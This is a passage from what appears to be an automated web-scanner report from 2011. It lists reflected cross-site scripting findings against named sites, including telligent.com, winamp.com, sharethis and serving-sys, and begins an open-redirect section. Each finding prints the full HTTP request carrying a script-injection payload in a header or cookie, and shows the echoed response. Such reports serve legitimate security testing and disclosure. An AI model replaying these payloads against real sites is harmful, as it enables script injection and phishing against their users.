<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=20662"><script>alert(1)</script>4f1a3620730">
...[SNIP]...
3.82. http://telligent.com/resources/m/analysts/1343205.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1343205.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137cc"><script>alert(1)</script>610a59d58cb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /resources/m/analysts/1343205.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a27+GMT; expires=Sun, 26-Feb-2012 23:22:27 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:27 GMT
Connection: close
Content-Length: 64261


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=137cc"><script>alert(1)</script>610a59d58cb">
...[SNIP]...
3.83. http://telligent.com/resources/m/analysts/1345217.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/analysts/1345217.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bbc8d"><script>alert(1)</script>3a0b6097669 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /resources/m/analysts/1345217.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a36+GMT; expires=Sun, 26-Feb-2012 23:22:36 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:36 GMT
Connection: close
Content-Length: 64972


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=bbc8d"><script>alert(1)</script>3a0b6097669">
...[SNIP]...
3.84. http://telligent.com/resources/m/success_stories/1331597.aspx [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /resources/m/success_stories/1331597.aspx

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad044"><script>alert(1)</script>2b4dec818f3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /resources/m/success_stories/1331597.aspx HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a22%3a43+GMT; expires=Sun, 26-Feb-2012 23:22:43 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:22:43 GMT
Connection: close
Content-Length: 64200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=ad044"><script>alert(1)</script>2b4dec818f3">
...[SNIP]...
3.85. http://telligent.com/support/request_an_upgrade/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://telligent.com
Path:   /support/request_an_upgrade/

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cdbf"><script>alert(1)</script>e4ccb6eed44 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /support/request_an_upgrade/ HTTP/1.1
Host: telligent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSExtendedAnalytics=13b36763-58d5-4e2d-a664-810fee6b36c6; __utmz=53647277.1298757602.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); AuthorizationCookie=649be3c6-1f4e-43ca-9aca-2fc7a463d13d; __utma=53647277.670287554.1298757602.1298757602.1298757602.1; CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+22%3a04%3a55+GMT; CommunityServer-LastVisitUpdated-1850=; __utmc=53647277; __utmb=53647277.1.10.1298757602; CSExtendedAnalyticsSession=560a102e-bd90-4a32-912f-ea337f9ef1cb;
Referer: http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Telligent-Evolution: 5.5.134.11785
Set-Cookie: CommunityServer-UserCookie1850=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Feb+2011+23%3a23%3a35+GMT; expires=Sun, 26-Feb-2012 23:23:35 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 26 Feb 2011 23:23:35 GMT
Connection: close
Content-Length: 61451


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<input type="hidden" id="referrer" name="referrer" value="http://www.google.com/search?hl=en&q=3cdbf"><script>alert(1)</script>e4ccb6eed44">
...[SNIP]...
3.86. http://www.watchmouse.com/en/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 169d7'-alert(1)-'05e31362016 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /en/ HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Referer: http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 01:36:30 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
ETag: "0-en-aae30c915a39ee69d50753ca20be732f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 18320

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<![CDATA[
       function checkReferrer(){
           var vref_string = encodeURIComponent('173.193.214.243::0::http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016::en');
           var serverRef = encodeURIComponent('http://www.google.com/search?hl=en&q=169d7'-alert(1)-'05e31362016');
           if(document && document.referrer){
               jsRef = encodeURIComponent(document.referre
...[SNIP]...
3.87. http://bs.serving-sys.com/BurstingPipe/adServer.bs [eyeblaster cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The value of the eyeblaster cookie is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 4de67%3balert(1)//33e2200b3e9 was submitted in the eyeblaster cookie. This input was echoed as 4de67;alert(1)//33e2200b3e9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2240932&PluID=0&w=125&h=125&ord=773834383&ucm=true&ncu=$$http://at.atwola.com/adlink/5113/1838222/0/6/AdId=1468660;BnId=1;itime=773834383;kvpg=techcrunch%2F2011%2F02%2F16%2Fforbes%2Daccused%2Dof%2Dlink%2D;kvugc=0;kvmn=93311144;kvtid=16lsqii1n1a3cr;kvseg=99999:53575:53656:54063:56768:56830:56835:60506:60515:53615:52766:60130:50213:50239;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://techcrunch.com/wp-content/themes/vip/tctechcrunch/_uac/adpage.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C4=; eyeblaster=BWVal=&BWDate=&debuglevel=4de67%3balert(1)//33e2200b3e9; A3=heSmakIJ0c9M00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8qaI0000000001tn; u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: eyeblaster=BWVal=&BWDate=&debuglevel=4de67;alert(1)//33e2200b3e9; expires=Fri, 27-May-2011 21:31:25 GMT; domain=bs.serving-sys.com; path=/
Set-Cookie: A3=heSmakII0c9M00001hK5JalZb0bfZ00001hvPTaiJy0c6L00001gIlWai180aCf00001gnhgai180cbS00001; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=8r8g0000000001tf7.Ws0000000001tf8z130000000001th8z6A0000000001tq8qaI0000000001tn; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
Set-Cookie: u2=3a6c8499-0c84-46b7-b54f-f22315d657803GI08g; expires=Fri, 27-May-2011 21:31:25 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Sun, 27 Feb 2011 02:31:24 GMT
Connection: close
Content-Length: 2143

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...
]/ig,ebRand).replace(/\[%tp_adid%\]/ig,4645229).replace(/\[%tp_flightid%\]/ig,2240932).replace(/\[%tp_campaignid%\]/ig,132985);}var ebO = new Object();ebO.w=125;ebO.h=125;ebO.ai=4645229;ebO.pi=0;ebO.d=4de67;alert(1)//33e2200b3e9;ebO.rnd=0000000211113368;ebO.title="";ebO.jt=1;ebO.jwloc=1;ebO.jwmb=1;ebO.jwt=0;ebO.jwl=0;ebO.jww=0;ebO.jwh=0;ebO.btf=0;ebO.bgs=escape(ebBigS);ebO.rp=escape(ebResourcePath);ebO.bs=escape("bs.serving-s
...[SNIP]...
3.88. http://seg.sharethis.com/getSegment.php [__stid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://seg.sharethis.com
Path:   /getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload c13e0<script>alert(1)</script>edfc50278cb was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?fpc=30dea60-12e64e877f0-4b740973-1&purl=null&jsref= HTTP/1.1
Host: seg.sharethis.com
Proxy-Connection: keep-alive
Referer: http://edge.sharethis.com/share4x/index.5c108f5ecedf280ce5fe5e8db7e38332.html
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Sun, 27 Feb 2011 02:18:22 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 1195


           <html>
           <head><title>ShareThis Segmenter</title></head>
           <body>
           
           No Segment
           <script type="text/javascript">
                   var ref=document.referrer;var lurl = (("https:" == document.location.p
...[SNIP]...
<div style='display:none'>clicookie:CszLBk1bK3ITLgrkJKQWAg==c13e0<script>alert(1)</script>edfc50278cb
userid:
</div>
...[SNIP]...
3.89. http://www.winamp.com/ [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /

Issue detail

The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ef6c8"-alert(1)-"2de3f40c518 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=USef6c8"-alert(1)-"2de3f40c518; s_pers=%20s_getnr%3D1298828698586-New%7C1361900698586%3B%20s_nrgvo%3DNew%7C1361900698588%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:15 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 71696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="USef6c8"-alert(1)-"2de3f40c518";</script>
...[SNIP]...
3.90. http://www.winamp.com/media-player/en [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /media-player/en

Issue detail

The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff2bf"-alert(1)-"2712191debe was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /media-player/en HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://forums.winamp.com/login.php?do=login
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; s_pers=%20s_getnr%3D1298828671740-New%7C1361900671740%3B%20s_nrgvo%3DNew%7C1361900671741%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-forums%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/media-player%252526ot%25253DA%3B; countryCookie=USff2bf"-alert(1)-"2712191debe

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:44:57 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 46321

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="USff2bf"-alert(1)-"2712191debe";</script>
...[SNIP]...
3.91. http://www.winamp.com/skin/slick-redux/222084 [countryCookie cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.winamp.com
Path:   /skin/slick-redux/222084

Issue detail

The value of the countryCookie cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4db17"-alert(1)-"8eb02fd3069 was submitted in the countryCookie cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /skin/slick-redux/222084 HTTP/1.1
Host: www.winamp.com
Proxy-Connection: keep-alive
Referer: http://www.winamp.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; CUNAUTHID=1.f2ed797a429811e090debf3ab4450fde.215b; countryCookie=US4db17"-alert(1)-"8eb02fd3069; s_pers=%20s_getnr%3D1298828716004-New%7C1361900716004%3B%20s_nrgvo%3DNew%7C1361900716004%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Daolwinamp%252Caolsvc%253D%252526pid%25253Dwna%25252520%2525253A%25252520winamp.com-main%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.winamp.com/skin/slick-redux/222084%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Sun, 27 Feb 2011 17:45:35 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Length: 34378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:og="h
...[SNIP]...
<script type="text/javascript">Common.cntCode="US4db17"-alert(1)-"8eb02fd3069";</script>
...[SNIP]...
4. Open redirection  previous
There are 4 instances of this issue:

Issue background

Open redirection vulnerabilities arise when an application incorporates user-controllable data into the target of a redirection in an unsafe way. An attacker can construct a URL within the application which causes a redirection to an arbitrary external domain. This behaviour can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targetting the correct domain with a valid SSL certificate (if SSL is used) lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

4.1. http://r.nexac.com/e/getdata.xgi [ru parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://r.nexac.com
Path:   /e/getdata.xgi

Issue detail

The value of the ru request parameter is used to perform an HTTP redirect. The payload http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 was submitted in the ru parameter. This caused a redirection to the following URL:

Request

GET /e/getdata.xgi?dt=br&pkey=jtkr94hrnfw22&ru=http%3a//ad8127a790827d41e/a%3fhttp%3a//ar.atwola.com/atd%3fit%3d7%26iv%3d<na_id>%26rand%3d329065 HTTP/1.1
Host: r.nexac.com
Proxy-Connection: keep-alive
Referer: http://cdn.at.atwola.com/_media/uac/tcode3.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y; OAX=rcHW801i4e0ADNVY

Response

HTTP/1.1 302 Found
Expires: Wed Sep 15 09:14:42 MDT 2010
Pragma: no-cache
P3P: policyref="http://www.nextaction.net/P3P/PolicyReferences.xml", CP="NOI DSP COR NID CURa ADMa DEVa TAIo PSAo PSDo HISa OUR DELa SAMo UNRo OTRo BUS UNI PUR COM NAV INT DEM STA PRE"
Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/
X-Powered-By: Jigawatts
Location: http://ad8127a790827d41e/a?http://ar.atwola.com/atd?it=7&iv=&rand=329065
Content-type: text/html
Date: Sun, 27 Feb 2011 17:45:09 GMT
Server: lighttpd/1.4.18
Content-Length: 1


4.2. http://tags.crwdcntrl.net/5/c=25/b=1225394 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://tags.crwdcntrl.net
Path:   /5/c=25/b=1225394

Issue detail

